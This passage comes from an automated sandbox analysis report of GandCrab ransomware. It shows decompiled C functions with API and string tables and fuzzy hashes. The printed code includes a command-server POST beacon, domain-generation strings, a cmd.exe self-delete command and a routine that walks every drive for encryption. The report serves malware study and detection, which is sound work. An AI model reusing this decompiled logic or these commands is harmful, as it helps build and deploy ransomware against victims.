				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0F585060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F585288
Sleep.KERNEL32(000003E8), ref: 0F5852C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F5852D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F5852E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F5852FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585310
wsprintfW.USER32 ref: 0F585328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585339

Strings

fabian wosar <3, xrefs: 0F5852F9
t, xrefs: 0F58526D
m.bi, xrefs: 0F585266
.bit, xrefs: 0F58527A
gdcb, xrefs: 0F585273
t, xrefs: 0F58525B

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: d1825d586f8624f3901625524a622172895362234e77ec1b0802ca379dd5396a
Instruction ID: a837bf1f86855d84c932208a36c83e99dd261ff7a176a6722088736031e62322
Opcode Fuzzy Hash: d1825d586f8624f3901625524a622172895362234e77ec1b0802ca379dd5396a
Instruction Fuzzy Hash: E431EB71E00309E7DB00DFA4DD85BEE7BB8FF44721F101125F605B6281EB745A068B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F5854F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0F5854F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0F587E40( &_v28);
				_v16 = E0F585220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xf58fb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xf58fb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xf58fb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xf58fb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xf58fb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xf58fb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0F588050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0F5853D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

APIs

Part of subcall function 0F587E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
Part of subcall function 0F587E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D

Part of subcall function 0F585220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F585288
Part of subcall function 0F585220: Sleep.KERNEL32(000003E8), ref: 0F5852C5
Part of subcall function 0F585220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F5852D3
Part of subcall function 0F585220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F5852E3
Part of subcall function 0F585220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F5852FF
Part of subcall function 0F585220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585310
Part of subcall function 0F585220: wsprintfW.USER32 ref: 0F585328
Part of subcall function 0F585220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585339

lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F585512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F585532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F585544
lstrcatA.KERNEL32(00000000,?), ref: 0F58555E
lstrlenA.KERNEL32(00000000), ref: 0F5855B3
lstrlenW.KERNEL32(?), ref: 0F5855BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F5855DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F585643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F58564D
InternetCloseHandle.WININET(0F58581B), ref: 0F585657

Strings

POST, xrefs: 0F5855CA
popkadurak, xrefs: 0F5855E9

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: 50375dacfd9a6222f4df5dfab2ccfa4eaa25df01561a5e83a441bb6f1c2db1fc
Instruction ID: 7427cf842f480294e08547429d7791379471136cf6f5da861cba3b359e4b6d84
Opcode Fuzzy Hash: 50375dacfd9a6222f4df5dfab2ccfa4eaa25df01561a5e83a441bb6f1c2db1fc
Instruction Fuzzy Hash: 7D41C671E0030AE6EB10AFA9DD41FED7F79FF88721F141125EA40B2241EB78564ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 0F5872A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F5872A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

APIs

lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873E8
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873F6

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 00a347930c613ccbb0d5350d7b6b2600b92491161b27efa0141adc65906399c2
Instruction ID: 5e1af2344e6d4b3c2a48226344ad4df0a39555e05da5ee398a47357ec6d8bdd6
Opcode Fuzzy Hash: 00a347930c613ccbb0d5350d7b6b2600b92491161b27efa0141adc65906399c2
Instruction Fuzzy Hash: 5F412232100612FFD7115FA8EE8C794BBA1FF08316F185535E416B2621D779B47AEB81

Uniqueness

Uniqueness Score: -1.00%

Function 0F585F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0F585F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xf592a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0F589170( &_v267, 0, 0xff);
					E0F585DC0( &_v268, _t31, lstrlenA(_t31));
					E0F585E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0F585F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0F585F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0F585F49
lstrlenA.KERNEL32(00000000), ref: 0F585F54
wsprintfA.USER32 ref: 0F585F6C
_memset.LIBCMT ref: 0F585F8B
lstrlenA.KERNEL32(00000000), ref: 0F585F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585FC3

Strings

ntdll.dll, xrefs: 0F585F33
RtlComputeCrc32, xrefs: 0F585F43
%Xeuropol, xrefs: 0F585F66

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: 095d2baa008bff8b64c7b411bb2640eb984a81ce6e6929caf4b2f3e1458ca378
Instruction ID: 385a465960556f8941655574efeaa2c36689c4abeb750ef906f7080a655123ff
Opcode Fuzzy Hash: 095d2baa008bff8b64c7b411bb2640eb984a81ce6e6929caf4b2f3e1458ca378
Instruction Fuzzy Hash: 3B113435E44304BBD7206B68ED49FAE7F78BB44B21F040075F905F2281EBB85A57AA51

Uniqueness

Uniqueness Score: -1.00%

Function 0F585350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F585350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0f585376
0x0f58537a
0x0f58537e
0x0f585388
0x0f585390
0x0f585399
0x0f5853b3
0x0f5853b3
0x0f585390
0x0f5853bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F5854E9,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000), ref: 0F585366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585388
wsprintfW.USER32 ref: 0F585399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F5853B3
ExitProcess.KERNEL32 ref: 0F5853BB

Strings

open, xrefs: 0F5853AC
/c timeout -c 5 & del "%s" /f /q, xrefs: 0F585393
cmd.exe, xrefs: 0F5853A7

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 20039c9c6269d5e4cb6edae670f9956e195e92e99c2c911f2e7e7e31a6341676
Instruction ID: e09e45b48663f837c3e9811199cf4d778e08a4ffb85ac4991b933953e111c7fa
Opcode Fuzzy Hash: 20039c9c6269d5e4cb6edae670f9956e195e92e99c2c911f2e7e7e31a6341676
Instruction Fuzzy Hash: D6F01C317C231033F12126645D0BF0B2E59AB89F32F280016B704BE2C29AE8641786A9

Uniqueness

Uniqueness Score: -1.00%

Function 0F582C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F582C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xf58f290; // 0x21
				asm("movdqu xmm0, [0xf58f280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0F582AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0F582C8A
BeginPaint.USER32(?,?), ref: 0F582C9F
lstrlenW.KERNEL32(?), ref: 0F582CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F582CBD
EndPaint.USER32(?,?), ref: 0F582CCB
CreateThread.KERNEL32 ref: 0F582CE9
DestroyWindow.USER32(?), ref: 0F582CF2

Strings

GandCrab!, xrefs: 0F582C5E

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 03fe6f4e7fc262c3fec18bf491b0a8652eef278254db1f0691bdd868c3a81248
Instruction ID: 7dd70b9b9c76b731d7425979708289aed013986bcc28d5dceecaf99a43ece8a4
Opcode Fuzzy Hash: 03fe6f4e7fc262c3fec18bf491b0a8652eef278254db1f0691bdd868c3a81248
Instruction Fuzzy Hash: 11119332104209BFD711DF54DD0AFBA7FA8FB48722F001616FD41E5290E7759526EB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F583FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F583FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xf58f350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F586F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0F585670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F584010
GetTickCount.KERNEL32 ref: 0F584035
GetDriveTypeW.KERNEL32(?), ref: 0F58405A
CreateThread.KERNEL32 ref: 0F584099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F5840DB
GetTickCount.KERNEL32 ref: 0F5840E1

Strings

?:\, xrefs: 0F584023

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: d4cec303b186f5f2fdde77e4a29a2dac19d8eea38d6ff3a154c802728047e42d
Instruction ID: fd7a28090f564a608222304982e78d080365528b895bd94cc6acfd6b22cf9f7f
Opcode Fuzzy Hash: d4cec303b186f5f2fdde77e4a29a2dac19d8eea38d6ff3a154c802728047e42d
Instruction Fuzzy Hash: D0514370908301DFC310DF18C984B5BBBE1FF88324F504A2EE989AB391D375A949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F586F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F586F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
